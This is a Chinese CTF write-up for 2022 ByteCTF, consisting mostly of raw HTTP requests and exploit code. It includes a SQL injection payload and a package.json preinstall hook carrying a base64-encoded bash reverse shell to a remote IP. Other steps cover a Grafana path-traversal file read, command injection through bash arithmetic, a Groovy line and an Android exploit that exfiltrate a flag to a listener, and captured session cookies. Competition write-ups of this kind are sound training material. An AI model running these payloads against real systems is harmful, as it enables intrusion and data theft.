EDI
JOIN US ▶▶▶
点击蓝字 · 关注我们
1
ctf_cloud
POST /users/signup HTTP/1.1Host: e0415807b2fc449027075f27a3cfe1e3.2022.capturetheflag.funUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101Firefox/83.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/jsonContent-Length: 59Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/Cookie: PHPSESSID=hftcgqq32s0or9hk89huvooo8p; connect.sid=s%3ApoFqQ8ErhSogbVMNdzwMcanbixoxlw3.l8FFINAquYbE9luPWO7uONwPJbat4BzzzG6W9GPCkswSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1{"username":"bcasd","password":"su',1),('admin','su',1)--"}
POST /dashboard/upload HTTP/1.1Host: e0415807b2fc449027075f27a3cfe1e3.2022.capturetheflag.funUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101Firefox/83.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryu3fv4Bf4rz9XvGktContent-Length: 330Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/Cookie:connect.sid=s%3A5zWp5eJF_cVlAadIxtC4gKiYlNG44Cs2.lDEXcfzsDuR7XUusa%2FMkld55S%2FNmj4uA%2FVZKIgXK0IwUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1X-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1------WebKitFormBoundaryu3fv4Bf4rz9XvGktContent-Disposition: form-data; name="c";filename="package.json"{"name": "userapp","version": "0.0.1","scripts": {"preinstall": "echoYmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuMjYuNTkuMTM3LzIzMzMgMD4mMQ==|base64 -d|bash"}}------WebKitFormBoundaryu3fv4Bf4rz9XvGkt--
POST /dashboard/dependencies HTTP/1.1Host: e0415807b2fc449027075f27a3cfe1e3.2022.capturetheflag.funUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101Firefox/83.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateOrigin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/Cookie:connect.sid=s%3A5zWp5eJF_cVlAadIxtC4gKiYlNG44Cs2.lDEXcfzsDuR7XUusa%2FMkld55S%2FNmj4uA%2FVZKIgXK0IwUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1X-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1Content-Type: application/jsonContent-Length: 48{"dependencies":{"su":"file:./public/uploads/"}}
2
easy_grafana
Grafana-CVE-2021-43798任意⽂件读取
GET /public/plugins/text/#/../../../../../../../../../..//etc/grafana/grafana.iniHTTP/1.1GET /public/plugins/text/#/../../../../../../../../../..//var/lib/grafana/grafana.dbHTTP/1.1
读配置⽂件得到secret_key:SW2YcwTIb9zpO1hoPsMm
GitHub - pedrohavay/exploit-grafana-CVE-2021-43798: This is a proof-of-concept exploit for Grafana'sUnauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).
from secure import decryptimport base64secret_key = 'SW2YcwTIb9zpO1hoPsMm'ciphertext = 'b0NXeVJoSXKPoSYIWt8i/GfPreRT03fO6gbMhzkPefodqe1nvGpdSROTvfHK1I3kzZy9SQnuVy9c3lVkvbyJcqRwNT6/'encrypted = base64.b64decode(ciphertext.encode())pwdBytes, _ = decrypt(encrypted, secret_key)print(pwdBytes)
1
survey
签退
2
bash_game
⽐较漏洞,命令执⾏
arr[$(cat /flag)]然后让他报错就⾏了。
3
easy_groovy
def f = new File("/flag").textdef res1 = new URL('http://ip:1234/1'+f).text
4
signin
5
find_it
看到scap,去搜了下,发现可以⽤sysdig分析,下载安装sysdig。
https://www.howtoing.com/how-to-monitor-your-ubuntu-16-04-system-with-sysdig/使⽤-r参数读⽂件,并把分析的⽂件导出
使⽤csysdig分析,发现有⼀个操作。传了⼀个nothing.png图⽚。
点进去能发现这个图⽚
这⾥使⽤010editor直接搜索,导出图⽚,是个⼆维码,扫描是flag的前半部分。这个php⽂件是flag的后半部分, 拼接起来是flag。
1
Bronze Droid
https://forum.butian.net/share/1175分析过程:
我们把给的apk⽂件⽤jadx-gui去解析下,第⼀步先看AndroidManifest.xml
查到资料是这个
https://erev0s.com/blog/exploiting-content-providers-through-an-insecure-setresult-implementation/⾥⾯的内容⼏乎与资料的内容⼀致。原理是setResult函数在调⽤之后,会⾃动的调⽤onActivityResult()函数,我们只需要在攻击程序中重写 onActivityResult()函数即可,在⾥⾯写⼀个跳转,进⽽远程带出flag,exp参考BabyAndroid的。
1.利⽤Android studio 创建项⽬,空⽩的项⽬即可
2.包名要跟它规定的⼀样,也就是pwnbronzedroid。
3.在AndroidManifest.xml添加要申请的权限 这是我们要进⾏申请权限(由于⽬标是30版本,我们这⾥要多加个 android:usesCleartextTraffic=”true”,因为⾼版本是禁⽌使⽤明⽂流量的)这个在readme.md⾥⾯也有描述
4.我们利⽤传参的⽅式来写主要exp,通过exp的传参,跳转到⽬标的攻击类⾥(MainActivity),然后通过⽬标的 攻击类中的⾃动调⽤,将flag进⾏外带。
5.魔改的onActivityResult⾥⾯写的主要是,我们进⾏获取远程的⼀个flag,并反弹到我们远程服务器上进⽽获取 flag
攻击exp
package com.bytectf.pwnbronzedroid;import android.app.Activity;import android.content.ContentValues;import android.content.Intent;import android.net.Uri;import android.os.Bundle;import android.provider.MediaStore;import android.util.Log;import android.widget.Toast;import java.io.BufferedReader;import java.io.ByteArrayOutputStream;import java.io.InputStream;import java.io.InputStreamReader;import java.io.OutputStream;import java.net.InetSocketAddress;import java.net.Socket;import java.net.SocketAddress;public class MainActivity extends Activity {// 参考 https://forum.butian.net/share/1175protected void onCreate(Bundle savedInstanceState) {super.onCreate(savedInstanceState);Intent intent = new Intent("ACTION_SHARET_TO_ME");intent.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION | Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);// 这里往后参考 https://erev0s.com/blog/exploiting-content-providers-through-an-insecure-setresult-implementation/intent.setClassName("com.bytectf.bronzedroid", "com.bytectf.bronzedroid.MainActivity");intent.setData(Uri.parse("content://com.bytectf.bronzedroid.fileprovider/root/data/data/com.bytectf.bronzedroid/files/flag"));startActivityForResult(intent,0);}// 这部分参考 https://forum.butian.net/share/1175 对onActivityResult 进行魔改protected void onActivityResult(int requestCode, int resultCode, Intent data) {super.onActivityResult(requestCode, resultCode, data);try {InputStream is = getContentResolver().openInputStream(data.getData());BufferedReader br = new BufferedReader(new InputStreamReader(is));StringBuilder sb = new StringBuilder();String line;while ((line = br.readLine()) != null) {sb.append(line);}is.close();br.close();String flag = sb.toString();new Thread(new Runnable() {public void run() {try {if (true) {Socket sk = new Socket();SocketAddress address = new InetSocketAddress("ip", 1235);sk.connect(address, 5000);sk.setTcpNoDelay(true);sk.setKeepAlive(true);OutputStream os = sk.getOutputStream();os.write(flag.getBytes());os.flush();os.close();sk.close();Thread.sleep(1000);}} catch (Exception e) {Log.e("FlagHunter_Err",e.toString());}}}).start();} catch ( Exception e) {throw new RuntimeException(e);}}}
下载1234端⼝的apk⽂件到远程链接,nc前半部分exp
from hashlib import *import itertoolsimport stringfrom Crypto.Hash import SHA256import itertoolsALPHABET = string.ascii_letters + string.digitssuffix = 'Zfecpd'digest = '5782089877f9ff411d7d6276df447eca181fc5a27dc3fadc5a0d68a0aa555581'print(f"suffix: {suffix}ndigest: {digest}")for i in itertools.product(ALPHABET,repeat=4):prefix = ''.join(i)guess = suffix + prefixif sha256(guess.encode()).hexdigest() == digest:print(f"Find XXXX: {prefix}")break
nc监听apk中写的1235端⼝,外带出flag
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
原文始发于微信公众号(EDI安全):2022 ByteCTF By EDISEC
